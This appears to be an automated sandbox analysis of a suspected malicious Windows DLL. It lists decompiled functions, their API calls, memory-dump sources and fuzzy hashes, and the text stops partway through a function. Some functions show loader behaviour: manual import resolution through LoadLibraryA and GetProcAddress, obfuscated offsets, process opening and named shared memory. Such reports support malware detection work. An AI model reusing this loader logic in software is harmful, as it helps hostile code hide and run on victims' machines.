0x6d642674
0x6d642674
0x6d64267d
0x6d64267e
0x6d642680
0x6d642682
0x6d642682
0x00000000
0x6d642674
0x6d642672
0x6d64264e
0x6d642655
0x6d642655
0x6d642657
0x00000000
0x00000000
0x6d642659
0x6d64265a
0x6d64265d
0x6d64265f
0x00000000
0x00000000
0x00000000
0x6d64265f
0x00000000
0x6d642655
0x6d6425d8
0x6d6425db
0x6d6425e0
0x00000000
0x00000000
0x6d6425e9
0x6d6425eb
0x6d6425f1
0x00000000
0x00000000
0x6d6425f7
0x6d6425fd
0x00000000
0x00000000
0x6d642603
0x6d642605
0x6d64260e
0x6d642612
0x00000000
0x00000000
0x6d642618
0x6d64261b
0x6d64261d
0x00000000
0x00000000
0x6d642624
0x6d642626
0x00000000
0x00000000
0x6d642628
0x6d64262c
0x00000000
0x00000000
0x00000000
0x6d64262c
0x00000000
0x00000000
0x00000000
0x6d642517
0x6d642517
0x6d642517
0x6d64251e
0x00000000
0x00000000
0x6d642520
0x6d642521
0x6d642523
0x00000000
0x00000000
0x00000000
0x6d642523
0x6d64254b
0x6d64254d
0x00000000
0x00000000
0x6d64255d
0x6d64255f
0x6d642561
0x00000000
0x00000000
0x6d642567
0x6d64256e
0x6d64259a
0x6d64259a
0x6d64259c
0x6d64259e
0x6d6425b2
0x6d6425b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6d6425a0
0x6d6425a0
0x6d6425a0
0x6d6425a9
0x6d6425aa
0x6d6425ac
0x6d6425ae
0x6d6425ae
0x00000000
0x6d6425a0
0x6d642570
0x6d642573
0x6d642575
0x6d642587
0x6d642587
0x6d64258a
0x6d64258c
0x6d64258c
0x6d64258d
0x6d64258d
0x6d642593
0x00000000
0x00000000
0x00000000
0x00000000
0x6d642577
0x6d642577
0x6d642577
0x6d64257e
0x00000000
0x00000000
0x6d642580
0x6d642580
0x6d642581
0x00000000
0x00000000
0x00000000
0x6d642581
0x6d642583
0x6d642585
0x6d642598
0x00000000
0x00000000
0x00000000
0x6d642598
0x00000000
0x6d642585
0x6d6424f7
0x6d6424fa
0x6d6424fd
0x00000000
0x00000000
0x6d6424ff
0x6d642501
0x00000000
0x00000000
0x00000000
0x6d642501
0x6d6424c6
0x6d6424c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D642536

Strings

@Bdm, xrefs: 6D642555
@Bdm, xrefs: 6D642694
@Bdm, xrefs: 6D642637

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID: @Bdm$@Bdm$@Bdm
API String ID: 2850889275-722537664
Opcode ID: 329bed79424b667daa55acef94ef76e06f374f81e21356ba3f4569438cbc1c75
Instruction ID: 2007ed2ab4bc134f0b6ad68590f139c5615d4087c3866b31133e017b050b7cc9
Opcode Fuzzy Hash: 329bed79424b667daa55acef94ef76e06f374f81e21356ba3f4569438cbc1c75
Instruction Fuzzy Hash: 9D61C1306446138FDB29CF29D8A076973B6FB8E368F34C469D916C7294E770D882CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6D64146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D64146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d6441b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d6441bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d6441ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d6441a8 = _t5;
					 *0x6d6441b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d6441a4 = _t6;
					if(_t6 == 0) {
						 *0x6d6441a4 =  *0x6d6441a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6d64146d
0x6d64147b
0x6d641483
0x6d641488
0x6d6414d2
0x6d6414d2
0x6d64148a
0x6d641492
0x6d6414ce
0x6d6414d0
0x6d641494
0x6d641494
0x6d641499
0x6d6414a7
0x6d6414ac
0x6d6414b2
0x6d6414ba
0x6d6414bf
0x6d6414c1
0x6d6414c1
0x6d6414cb
0x6d6414cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D6417B8,76D263F0,00000000), ref: 6D64147B
GetVersion.KERNEL32 ref: 6D64148A
GetCurrentProcessId.KERNEL32 ref: 6D641499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D6414B2

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 1b8804481e03314e928aed295978ddaea08c43920e36187884a3ed133dfbb055
Instruction ID: da9e1e63f2851b3d81ee1ab3ea53779c73f3336adf80ce43d56549f133ca8553
Opcode Fuzzy Hash: 1b8804481e03314e928aed295978ddaea08c43920e36187884a3ed133dfbb055
Instruction Fuzzy Hash: C8F01771684251AFEF50BF6AA80A7A53BB4BB1EB11F11C21AF115EA1C0E3F060C58B54

Uniqueness

Uniqueness Score: -1.00%

Function 6D641566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6D641566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6d64156a
0x6d64157b
0x6d641583
0x6d641585
0x6d641598
0x6d641598
0x6d6415a2

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6D641C5E,?,6D641810,?,00000000,00000000,?,?,?,6D641810), ref: 6D64157B
GetSystemDefaultUILanguage.KERNEL32(?,?,6D641C5E,?,6D641810,?,00000000,00000000,?,?,?,6D641810), ref: 6D641585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6D641C5E,?,6D641810,?,00000000,00000000,?,?,?,6D641810), ref: 6D641598

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 5aad292729460656e230cca0546c80e3822aa2e6e1374e4f9d8cf65092bd904c
Instruction ID: f77987b89f69c7d8bc083af2b9645bb3aa1521da895b8b0db7912eca5a5bcffb
Opcode Fuzzy Hash: 5aad292729460656e230cca0546c80e3822aa2e6e1374e4f9d8cf65092bd904c
Instruction Fuzzy Hash: 61E048A8640205F7E710E7919D06FBD72789704B0AF504144F701D60C0D7749E049765

Uniqueness

Uniqueness Score: -1.00%

Function 6D641F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D641F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d6441cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6d641f31
0x6d641f3a
0x6d641f3f
0x6d641f45
0x6d641f4e
0x6d641f54
0x6d641f56
0x6d641f59
0x6d641f5e
0x6d641f65
0x6d641f65
0x6d641f69
0x6d641f71
0x6d641f74
0x00000000
0x00000000
0x6d641f7a
0x6d641f84
0x6d641f86
0x6d641f89
0x6d641f8c
0x6d641f90
0x6d641f98
0x6d641f9a
0x6d641f9d
0x6d642005
0x6d642005
0x6d642009
0x00000000
0x00000000
0x6d641fa2
0x6d641fa8
0x6d641faa
0x6d641fbd
0x6d641fc0
0x6d641fc0
0x6d641fc0
0x6d641fc4
0x6d641fac
0x6d641fac
0x6d641fb4
0x6d641fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x6d641fb6
0x6d641fa4
0x6d641fa4
0x6d641fb8
0x6d641fb8
0x6d641fb8
0x6d641fc7
0x6d641fca
0x6d641fcc
0x6d641fd3
0x6d641fce
0x6d641fce
0x6d641fce
0x6d641fdb
0x6d641fe1
0x6d641fe3
0x6d642013
0x6d641fe5
0x6d641fe5
0x6d641fe8
0x6d641fea
0x6d641ff2
0x6d641ff2
0x6d641ff7
0x6d641ff9
0x6d642000
0x6d642002
0x6d642002
0x6d642002
0x00000000
0x6d642002
0x00000000
0x6d641fe3
0x6d641f92
0x6d641f94
0x6d641f96
0x00000000
0x00000000
0x6d641f96
0x6d642016
0x6d642016
0x6d64201d
0x6d642022
0x00000000
0x00000000
0x6d642028
0x6d642033
0x00000000
0x6d642033
0x6d64202a
0x6d64202a
0x6d642030
0x00000000
0x6d642030
0x6d641f5e
0x6d642034
0x6d642039

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6D641F69
GetProcAddress.KERNEL32(?,00000000), ref: 6D641FDB

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 21c97543d06e2b86bc253e60592cd840f3f528e71f684182c7b62b9417dfbdb8
Instruction ID: 787c58b37acdaad4ee6845fd5ff960a8084edc6ab0f289c73104f2c85dbb9c3f
Opcode Fuzzy Hash: 21c97543d06e2b86bc253e60592cd840f3f528e71f684182c7b62b9417dfbdb8
Instruction Fuzzy Hash: 6F3103B1A0020ADFDB55CF99C880BAEB7F4BF49754B20C16AE811EB240E778DA51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6D642264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6D642264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6D6423CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6D642485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6D642370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6D6423CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6D642467(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6d642268
0x6d642269
0x6d64226a
0x6d64226d
0x6d64226f
0x6d642272
0x6d642273
0x6d642275
0x6d642276
0x6d642277
0x6d64227a
0x6d642284
0x6d642335
0x6d64233c
0x6d642345
0x6d64228a
0x6d64228a
0x6d642290
0x6d642296
0x6d642299
0x6d64229c
0x6d6422a0
0x6d6422a5
0x6d6422aa
0x6d64232a
0x00000000
0x6d6422ac
0x6d6422ac
0x6d6422b8
0x6d6422ba
0x6d642315
0x6d642315
0x6d64231b
0x00000000
0x6d6422bc
0x6d6422cb
0x6d6422cd
0x6d6422ce
0x6d6422cf
0x6d6422d2
0x6d6422d2
0x6d6422d4
0x00000000
0x6d6422d6
0x6d6422d6
0x6d642320
0x6d6422d8
0x6d6422d8
0x6d6422dc
0x6d6422e4
0x6d6422e9
0x6d6422ee
0x6d6422fa
0x6d642302
0x6d642309
0x6d64230f
0x6d642313
0x00000000
0x6d642313
0x6d6422d6
0x6d6422d4
0x00000000
0x6d6422ba
0x6d64232e
0x6d64232e
0x6d64232e
0x6d6422aa
0x6d64234a
0x6d642351

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: d691cde7868c2fb4a781d24ce4d811538b8e65959c78fc683b87ec76f7eb3d78
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 3021A1729042059BCB21DF68C8D09ABBBB5FF4D350B56C1A8D919DB245DB30FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D68CCE2, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513537298.000000006D68C000.00000040.00020000.sdmp, Offset: 6D68C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 4ef1ccbcf148ed764a943ae7c53079d19c999c8d109817dcdbb57a09b9f16c73
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: DE11B1733405019FD714DE5AEC80EA2B7AAFB9D2307268166ED09CB302E776E801C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D68D0DB, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513537298.000000006D68C000.00000040.00020000.sdmp, Offset: 6D68C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: eb7f25bda04bae1381a4bee4664525101919ebda3ba640c999f8d49eee161478
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 3B01DE363142018FD719CB2CD984DBABBE4EFCA36AB15C07FC58683616E224E845CE30

Uniqueness

Uniqueness Score: -1.00%

Function 6D685B3C, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 311COMMON

Download Yara Rule

APIs

operator+.LIBCMT ref: 6D685BB5
DName::DName.LIBCMT ref: 6D685BD5
operator+.LIBCMT ref: 6D685C15
UnDecorator::getScope.LIBCMT ref: 6D685C3E
operator+.LIBCMT ref: 6D685C4A
DName::operator+.LIBCMT ref: 6D685C54
operator+.LIBCMT ref: 6D685B57

Part of subcall function 6D683058: DName::DName.LIBCMT ref: 6D68306B
Part of subcall function 6D683058: DName::operator+.LIBCMT ref: 6D683072

DName::DName.LIBCMT ref: 6D685B78
operator+.LIBCMT ref: 6D685C61
UnDecorator::getThisType.LIBCMT ref: 6D685CA1
operator+.LIBCMT ref: 6D685CE0
DName::operator+.LIBCMT ref: 6D685CEA
UnDecorator::getThisType.LIBCMT ref: 6D685CFC
DName::operator|=.LIBCMT ref: 6D685D06
operator+.LIBCMT ref: 6D685D1D
DName::DName.LIBCMT ref: 6D685E83

Strings

$Iym Iym(Iym, xrefs: 6D685B3E

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: operator+$NameName::$Decorator::getName::operator+$ThisType$Name::operator|=Scope
String ID: $Iym Iym(Iym
API String ID: 398566123-3637418734
Opcode ID: 5c05a0b9dea83bafc8df243b6b658d5dfa429083de6a059c2a48e5b00a7a9806
Instruction ID: 8ecac473325d2190ca3149129f7e9382218119b5b658a4a482e910d306361176
Opcode Fuzzy Hash: 5c05a0b9dea83bafc8df243b6b658d5dfa429083de6a059c2a48e5b00a7a9806
Instruction Fuzzy Hash: 2DB18272904249AFCF10DFA4C894EFDB7B8AB0D354F01406AE616EB292DB709644CB79

Uniqueness

Uniqueness Score: -1.00%

Function 6D67975C, Relevance: 15.1, APIs: 10, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6D679775

Part of subcall function 6D6762EB: __calloc_impl.LIBCMT ref: 6D6762FC

__calloc_crt.LIBCMT ref: 6D679799
__calloc_crt.LIBCMT ref: 6D6797B5
__copytlocinfo_nolock.LIBCMT ref: 6D6797DA
__setlocale_nolock.LIBCMT ref: 6D6797E7
___removelocaleref.LIBCMT ref: 6D6797F3
___freetlocinfo.LIBCMT ref: 6D6797FA
__setmbcp_nolock.LIBCMT ref: 6D679812
___removelocaleref.LIBCMT ref: 6D679827
___freetlocinfo.LIBCMT ref: 6D67982E

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3967206232-0
Opcode ID: a701ed512f87a49312e378cb8804229947c4e2f842cddbe7443ef6e91f3fef4b
Instruction ID: 95f5eb1b031b2aad95e3d70000f5aef0e94d577051e7147b0d652515807094f9
Opcode Fuzzy Hash: a701ed512f87a49312e378cb8804229947c4e2f842cddbe7443ef6e91f3fef4b
Instruction Fuzzy Hash: 0D21293550C60DAFD732AF6CD801D5A7BE4EF8D758B11842EE59C46160DF32D810CA59

Uniqueness

Uniqueness Score: -1.00%

Function 6D641979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D641979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D642210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d6441d0;
				_push(_t15 + 0x6d64505e);
				_push(_t15 + 0x6d645054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D64220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6d6441c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d641979
0x6d641982
0x6d641986
0x6d64198c
0x6d641991
0x6d641996
0x6d641999
0x6d64199c
0x6d6419a1
0x6d6419a2
0x6d6419a5
0x6d6419b0
0x6d6419b7
0x6d6419bb
0x6d6419bd
0x6d6419be
0x6d6419c1
0x6d6419c6
0x6d6419d0
0x6d6419d2
0x6d6419d2
0x6d6419ec
0x6d6419f0
0x6d641a40
0x6d6419f2
0x6d6419fb
0x6d641a11
0x6d641a19
0x6d641a2b
0x6d641a2f
0x00000000
0x00000000
0x6d641a1b
0x6d641a1e
0x6d641a23
0x6d641a25
0x6d641a25
0x6d641a06
0x6d641a08
0x6d641a31
0x6d641a32
0x6d641a32
0x6d6419fb
0x6d641a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?,?), ref: 6D641986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D64199C
_snwprintf.NTDLL ref: 6D6419C1
CreateFileMappingW.KERNEL32(000000FF,6D6441C0,00000004,00000000,?,?), ref: 6D6419E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D6419FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D641A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D641A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A), ref: 6D641A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D64176E,0000000A,?), ref: 6D641A3A

Memory Dump Source

Source File: 00000001.00000002.513118342.000000006D641000.00000020.00020000.sdmp, Offset: 6D640000, based on PE: true

Associated: 00000001.00000002.513091226.000000006D640000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513157368.000000006D643000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.513202631.000000006D645000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.513228684.000000006D646000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 487f452f5fcc952b15d5e55eb9ad79a609f20aefdaae8a481ebd3405e8f3e324
Instruction ID: d5b5e224240f75ef8bd03eb3050d69f804ce268de3c835a861481d7e3a042ae2
Opcode Fuzzy Hash: 487f452f5fcc952b15d5e55eb9ad79a609f20aefdaae8a481ebd3405e8f3e324
Instruction Fuzzy Hash: 3A21CCB2640108BFDB11EFA9DC84FAE3BB8EB4E354F10C125F615D7180DB7498958B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D684A81, Relevance: 12.1, APIs: 8, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6D684A8B
DName::DName.LIBCMT ref: 6D684A97

Part of subcall function 6D6829CC: DName::doPchar.LIBCMT ref: 6D6829F9

DName::DName.LIBCMT ref: 6D684AC4

Part of subcall function 6D68262D: DNameStatusNode::make.LIBCMT ref: 6D68265B

UnDecorator::getScopedName.LIBCMT ref: 6D684AD2
DName::operator+=.LIBCMT ref: 6D684ADC
DName::operator+=.LIBCMT ref: 6D684AEB
DName::operator+=.LIBCMT ref: 6D684AF7
DName::operator+=.LIBCMT ref: 6D684B04

Memory Dump Source

Source File: 00000001.00000002.513311409.000000006D64F000.00000020.00020000.sdmp, Offset: 6D64F000, based on PE: false

Similarity

API ID: NameName::operator+=$Name::$Decorator::Decorator::getName::doNode::makePcharScopedScoreStatus
String ID:
API String ID: 2229739886-0
Opcode ID: fc5e5e6a1abf896655c1611ee8160a1d268b157798602f17028a713b7ccbbf16
Instruction ID: ff3787b4063aa0a560a51b6c37a2866b347ef49ff199c158cf4360d898b80f6a
Opcode Fuzzy Hash: fc5e5e6a1abf896655c1611ee8160a1d268b157798602f17028a713b7ccbbf16
Instruction Fuzzy Hash: 4A11C871504149AFDB15DBA4C854BFD7B79AB0C308F014059E5199B293DFF0AA45CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 6D641AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D641AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D641C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d6441d0 + 0x6d645014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d6441d0 + 0x6d6450e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D64136A(_t56);
					} else {
